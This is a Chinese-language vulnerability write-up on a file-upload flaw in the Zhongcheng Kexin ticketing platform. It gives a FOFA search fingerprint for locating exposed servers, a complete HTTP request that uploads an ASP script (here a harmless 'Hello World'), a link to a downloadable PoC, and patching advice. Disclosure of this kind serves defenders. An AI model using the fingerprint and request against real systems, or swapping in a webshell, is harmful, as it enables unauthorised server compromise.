0x00、声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用,请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者无关。请遵守《中华人民共和国网络安全法》。
中华人民共和国网络安全法
第二十七条 规定
任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具;明知他人从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
0x01、概述
1.1、相关信息
中成科信是一家智慧旅游服务商,通过大数据、云计算、人工智能、移动互联网等新技术,在智慧旅游涉及的众多领域,针对游客的旅游生活、旅游服务企业的经营发展、政府行使职能过程中的相关需求,进行了智慧的感知、互联、处理和协调,将旅游构建成为一个“科技+人文”的智慧生态系统。
1.2、漏洞描述
中成科信票务管理平台Introduction接口存在文件上传漏洞,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!
1.3、指纹
fofa:body="SystemManager/SoftwareLicense.htm"
0x02、漏洞复现
2.1、数据包
POST /SystemManager/Introduction.ashx HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 2215
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: multipart/form-data; boundary=asdasdscasdasdacdwdafdasa
Accept-Encoding: gzip
--asdasdscasdasdacdwdafdasa
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: image/jpeg
<%
response.write("Hello World!")
%>
--asdasdscasdasdacdwdafdasa
Content-Disposition: form-data; name="fileName"
1.asp
--asdasdscasdasdacdwdafdasa
Content-Disposition: form-data; name="Method"
UpdateUploadLinkPic
--asdasdscasdasdacdwdafdasa--
2.2、测试截图
2.3、访问上传路径
http://ip/{{返回路径}}
0x03、漏洞检测POC
3.1、nuclei脚本
测试截图:
3.2、python脚本
测试截图:
3.3、poc下载链接
中成科信票务管理平台Introduction_upload_POC 链接:
https://www.alipan.com/s/ZbPTARyqr9B
0x04、修复建议
1、升级到安全版本或者打补丁严格限制和校验上传的文件;
2、禁止上传恶意代码的文件;
3、限制相关目录的执行权限,防范webshell攻击。